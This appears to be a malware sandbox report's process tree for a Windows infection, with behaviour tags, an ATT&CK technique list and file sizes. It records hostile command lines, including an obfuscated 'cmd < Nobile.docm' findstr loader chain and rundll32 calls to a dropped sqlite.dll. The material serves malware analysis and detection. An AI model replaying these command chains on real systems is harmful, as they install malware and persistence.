C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2592 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2856 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --mojo-platform-channel-handle=3160 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --mojo-platform-channel-handle=3040 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --mojo-platform-channel-handle=3644 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --mojo-platform-channel-handle=3420 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --mojo-platform-channel-handle=2252 /prefetch:85⤵
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_2DCF.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4208 -ip 42081⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{0b224206-c88f-3148-ba63-9a2341bb024d}\oemvista.inf" "9" "4d14a44ff" "0000000000000154" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000138" "a479"2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3260 -ip 32601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4512 -ip 45121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3584 -ip 35841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3504 -ip 35041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5972 -ip 59721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 440 -ip 4401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 680 -ip 6801⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 4603⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4028 -ip 40281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5392 -ip 53921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2616 -ip 26161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2232 -ip 22321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1464 -ip 14641⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6008 -ip 60081⤵
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm1⤵
-
C:\Windows\SysWOW64\cmd.execmd2⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm3⤵
-
-
C:\Windows\SysWOW64\PING.EXEping localhost3⤵
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.comRimasta.exe.com J3⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\RegAsm.exe4⤵
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6332 -ip 63321⤵
-
C:\Users\Admin\AppData\Local\Temp\8455.exeC:\Users\Admin\AppData\Local\Temp\8455.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\8455.exeC:\Users\Admin\AppData\Local\Temp\8455.exe2⤵
- Enumerates connected drives
- Modifies system certificate store
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6296 -ip 62961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6396 -ip 63961⤵
-
C:\Users\Admin\AppData\Local\Temp\B087.exeC:\Users\Admin\AppData\Local\Temp\B087.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\B087.exeC:\Users\Admin\AppData\Local\Temp\B087.exe2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 6512 -ip 65121⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 4563⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6340 -ip 63401⤵
-
C:\Users\Admin\AppData\Local\Temp\E19A.exeC:\Users\Admin\AppData\Local\Temp\E19A.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6436 -s 2362⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2144 -ip 21441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6404 -ip 64041⤵
-
C:\Users\Admin\AppData\Local\Temp\F7B3.exeC:\Users\Admin\AppData\Local\Temp\F7B3.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 2922⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5832 -ip 58321⤵
-
C:\Users\Admin\AppData\Local\Temp\A04.exeC:\Users\Admin\AppData\Local\Temp\A04.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1511.exeC:\Users\Admin\AppData\Local\Temp\1511.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 3122⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6460 -ip 64601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 6436 -ip 64361⤵
-
C:\Users\Admin\AppData\Local\Temp\57C8.exeC:\Users\Admin\AppData\Local\Temp\57C8.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6288 -ip 62881⤵
-
C:\Users\Admin\AppData\Local\Temp\6E01.exeC:\Users\Admin\AppData\Local\Temp\6E01.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6152 -s 3002⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6824 -ip 68241⤵
-
C:\Users\Admin\AppData\Local\Temp\7F86.exeC:\Users\Admin\AppData\Local\Temp\7F86.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7F86.exeC:\Users\Admin\AppData\Local\Temp\7F86.exe2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6552 -ip 65521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6152 -ip 61521⤵
-
C:\Users\Admin\AppData\Local\Temp\CB55.exeC:\Users\Admin\AppData\Local\Temp\CB55.exe1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7156 -ip 71561⤵
-
C:\Users\Admin\AppData\Local\Temp\E69F.exeC:\Users\Admin\AppData\Local\Temp\E69F.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 2362⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\822.exeC:\Users\Admin\AppData\Local\Temp\822.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\EE9.exeC:\Users\Admin\AppData\Local\Temp\EE9.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 2402⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\1AE1.exeC:\Users\Admin\AppData\Local\Temp\1AE1.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 500 -s 3122⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 4784 -ip 47841⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 664 -p 2864 -ip 28641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5232 -ip 52321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 7040 -ip 70401⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 500 -ip 5001⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
836KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
288KB
-
Filesize
36KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
240KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
44KB
-
Filesize
504KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
2.5MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
436KB
-
Filesize
8KB
-
Filesize
80KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
184KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
8KB
-
Filesize
4KB